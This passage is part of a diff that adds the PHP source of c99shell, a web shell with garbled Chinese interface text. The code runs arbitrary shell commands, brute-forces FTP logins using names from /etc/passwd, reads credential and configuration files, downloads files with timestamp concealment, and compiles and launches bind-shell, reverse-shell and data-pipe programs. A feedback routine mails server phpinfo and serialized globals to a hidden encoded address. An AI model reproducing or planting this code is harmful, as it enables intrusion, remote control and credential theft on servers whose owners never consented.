    "; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "
    å—å½±å“的列: ".$affected."
    "; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "生æˆç›®å½• \"".htmlspecialchars($mkdir)."\": 目标已存在";} + elseif (!mkdir($mkdir)) {echo "生æˆç›®å½• \"".htmlspecialchars($mkdir)."\": æ‹’ç»è®¿é—®";} + echo "

    "; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "Ftp Quick brute:
    "; + if (!win) {echo "此功能无法在windowså¹³å°ä½¿ç”¨!

    ";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} + else {$TRUE = TRUE;} + if ($TRUE) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "连接到 ".$host." with login \"".$login."\" and password \"".$pass."\".
    "; + ob_flush(); + return TRUE; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "无法å–å¾— /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = FALSE;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "连接到 ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
    "; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "连接失败!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "
    完æˆ!
    总计 (secs.): ".$ftpquick_t."
    总连接: ".$i."
    æˆåŠŸ.: ".$success."
    失败.:".($i-$success)."
    Connects per second: ".round($i/$ftpquick_t,2)."
    "; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "

    优先读å–:

    用户åªä»¥ shell  

    登陆  
    登陆进文件 
    Logging to e-mail? 

    "; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "
    æƒé™æ‹’ç»!
    ";} + else + { + echo "目录信æ¯:"; + if (!$win) + { + echo "
    用户/组 "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "
    Perms".view_perms_color($d)."
    添加时间 ".date("d/m/Y H:i:s",filectime($d))."
    Access time ".date("d/m/Y H:i:s",fileatime($d))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

    "; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} +if ($act == "security") +{ + echo "
    æœåŠ¡å™¨å®‰å…¨ä¿¡æ¯:
    Open base dir: ".$hopenbasedir."
    "; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "*nix /etc/passwd:
    "; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "
    从:  åˆ°:  

    "; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "".$uid["dir"].""; + echo join(":",$uid)."
    "; + } + $i++; + } + } + else {echo "
    获得 /etc/passwd
    ";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "无法破解 winnt 密ç (".$v.")
    ";} + else {echo "å¯ä»¥ç ´è§£ winnt 密ç . 下载, 使用 lcp.crack+
    ";} + } + if (file_get_contents("/etc/userdomains")) {echo "æµè§ˆ cpanel 用户域å日志
    ";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "æµè§ˆ cpanel 日志
    ";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache é…ç½® (httpd.conf)
    ";} + if (file_get_contents("/etc/httpd.conf")) {echo "Apache é…ç½® (httpd.conf)
    ";} + if (file_get_contents("/etc/syslog.conf")) {echo "系统日志é…ç½®(syslog.conf)
    ";} + if (file_get_contents("/etc/motd")) {echo "æ¯æ—¥æ示
    ";} + if (file_get_contents("/etc/hosts")) {echo "主机
    ";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)."
    ";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": 项目已存在";} + elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": æ‹’ç»è®¿é—®";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ + echo "
    ç¼–ç :
    输入:




    Hashes:
    "; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." -
    "; + } + echo "
    Url:

    urlencode - +
    urldecode - +
    Base64:
    base64_encode -
    "; + echo "
    base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "";} + else {$rows++; echo "";} + echo " ^"; + } + echo "

    Base convertations:
    dec2hex -
    "; +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "
    缓存为空!
    ";} + else {echo "文件系统缓存

    "; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "感谢您使用 c99shell v.".$shver."!"; c99shexit(); } + else {echo "
    ä¸èƒ½åˆ é™¤ ".__FILE__."!
    ";} + } + else + { + if (!empty($rndcode)) {echo "错误: ä¸æ­£ç¡® confimation!";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "
    移动: ".__FILE__."
    你确定?
    确认, 请键入 \"".$rnd."\"
     "; + } +} +if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "".$ret.""; if (stristr($ret,"new version")) {echo "

    ";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "
    感谢您的返馈! 您的å¸å· ID: ".$ticket.".
    "; + } + else {echo "
    å馈或报告BUG(".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

    您的åå­—:

    您的 e-mail:

    想说的è¯:


    附加æœåŠ¡å™¨ä¿¡æ¯ *

    没有报到形å¼.

    * - 强烈推è, 希望您报告BUG, 因为我们需è¦å®ƒæ¥æ”¹è¿›æœ¨é©¬.

    我们了解的语言: 英语, 俄语。

    ";} +} +if ($act == "search") +{ + echo "在文件中查找:
    "; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "没有找到文件!";} + else + { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "
    + +Search for (file/folder name):   - regexp +
    Search in (explode \";\"): +

    Text:
    +

    - regexp +   - whole words only +   - case sensitive +   - find files NOT containing the text +

    "; + if ($act == "ls") {$dspact = $act; echo "
    查找 took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

    ";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "更改文件属性错误: ä¸èƒ½å–得当å‰å€¼.";} + else + { + $form = TRUE; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "改å˜æ–‡ä»¶å±žæ€§ (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
    ".($err?"错误: ".$err:"")."
    Owner

     Read
     Write
    eXecute
    Group

     Read
     Write
    eXecute
    World

     Read
     Write
    eXecute
    "; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!
    ";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!
    ";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
    ";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "".$uploadmess.""; + $act = "ls"; + } + else + { + echo "文件上传:
    ".$uploadmess."
    +Select file on your local computer:
                   or
    +Input URL:

    +Save this file dir:

    +File-name (auto-fill):

    + convert file name to lovercase

    + +
    "; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
    ";} + } + if (!empty($delerr)) {echo "删除出错:
    ".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, 缓冲存储æŸå. For enable, set directive \"\$useFSbuff\" as TRUE.
    ";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "粘贴出错:
    ".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
    ";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "Archivation 错误:
    ".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "粘贴出错:
    ".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + echo "指令执行结果:
    "; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + @chdir($olddir); + } + else {echo "执行指令"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + echo "


     æ˜¾ç¤ºåœ¨æ–‡æœ¬åŒºåŸŸ 
    "; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "
    ä¸èƒ½æ‰“å¼€ç£ç›˜ (".htmlspecialchars($d).")!
    ";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "文件å称"; + $row[] = "文件大å°"; + $row[] = "创建与修改时间"; + if (!$win) + {$row[] = "Owner/Group";} + $row[] = "æƒé™"; + $row[] = "支æŒè¡Œä¸º"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = ""; + $y .= "\"".($parsesort[1]"; + $row[$k] .= $y; + for($i=0;$i".$row[$i]."";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! é…置错误 in \$regxp_highlight[".$k."][0] - 未知指令."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = ""; $r[3] = "";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = " [".$disppath."]"; + } + else + { + $type = "DIR"; + $row[] = " [".$disppath."]"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = " ".$disppath.""; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "".view_perms_color($v).""; + if ($o == ".") {$checkbox = ""; $i--;} + else {$checkbox = "";} + if (is_dir($v)) {$row[] = "\"文件信æ¯\" ".$checkbox;} + else {$row[] = "\"文件信æ¯\" \"编辑\" \"å¯ä»¥ä¸‹è½½\" ".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "
    列出文件夹 (".count($tab["files"])." 文件和 ".(count($tab["folders"])+count($tab["links"]))." 文件夹):

    o0↑謎誷↓0o:文件æƒé™è¯´æ˜Žæ示***[drwxrwxrwx]→[d]目录[rwx]拥有者[r-x]åŒç»„用户[r-x]其他用户

    [r]代表å¯è¯»[w]代表å¯å†™[x]代表å¯ä»¥æ‰§è¡Œ


    "; + foreach($table as $row) + { + echo "\r\n"; + foreach($row as $v) {echo "\r\n";} + echo "\r\n"; + } + echo "
    ".$v."

    + +    + "; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "                   "; + } + echo " 

    "; + echo ""; + } +} +if ($act == "tools") +{ + $bndportsrcs = array( + "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), + "c99sh_bindport.c"=>array("Using C","%path %port %pass") + ); + $bcsrcs = array( + "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), + "c99sh_backconn.c"=>array("Using C","%path %host %port") + ); + $dpsrcs = array( + "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), + "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") + ); + if (!is_array($bind)) {$bind = array();} + if (!is_array($bc)) {$bc = array();} + if (!is_array($datapipe)) {$datapipe = array();} + + if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} + if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} + + if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} + if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} + + if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} + if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} + if (!empty($bindsubmit)) + { + echo "绑定端å£å›žæ˜¾:
    "; + $v = $bndportsrcs[$bind["src"]]; + if (empty($v)) {echo "未知文件!
    ";} + elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "端å£å·²ç»è¢«ä½¿ç”¨ï¼Œè¯·é€‰æ‹©å…¶ä»–端å£ï¼
    ";} + else + { + $w = explode(".",$bind["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "ä¸èƒ½å†™ä¿¡æ¯è¿› \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($bind["src"])) {echo "ä¸èƒ½ä¸‹è½½èµ„æº!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%port",$bind["port"],$v[1]); + $v[1] = str_replace("%pass",$bind["pass"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); + if (!$sock) {echo "ä¸èƒ½è¿žæŽ¥åˆ° localhost:".$bind["port"]."! 我想你应该é…置你的防ç«å¢™ï¼.";} + else {echo "绑定中... ok!连接到 ".getenv("SERVER_ADDR").":".$bind["port"]."! 你应该使用 NetCat©, è¿è¡Œ \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    查看绑定的进程
    ";} + } + echo "
    "; + } + } + if (!empty($bcsubmit)) + { + echo "返回连接信æ¯:
    "; + $v = $bcsrcs[$bc["src"]]; + if (empty($v)) {echo "未知文件!
    ";} + else + { + $w = explode(".",$bc["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "ä¸èƒ½å†™ä¿¡æ¯è¿› \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($bc["src"])) {echo "无法下载资æº!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%host",$bc["host"],$v[1]); + $v[1] = str_replace("%port",$bc["port"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + echo "脚本现在å°è¯•è¿žæŽ¥åˆ° ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...
    "; + } + } + } + if (!empty($dpsubmit)) + { + echo "返回数æ®ç®¡é“ä¿¡æ¯:
    "; + $v = $dpsrcs[$datapipe["src"]]; + if (empty($v)) {echo "未知文件!
    ";} + elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "端å£å·²ç»è¢«ä½¿ç”¨ï¼Œè¯·é€‰æ‹©å…¶ä»–端å£ï¼
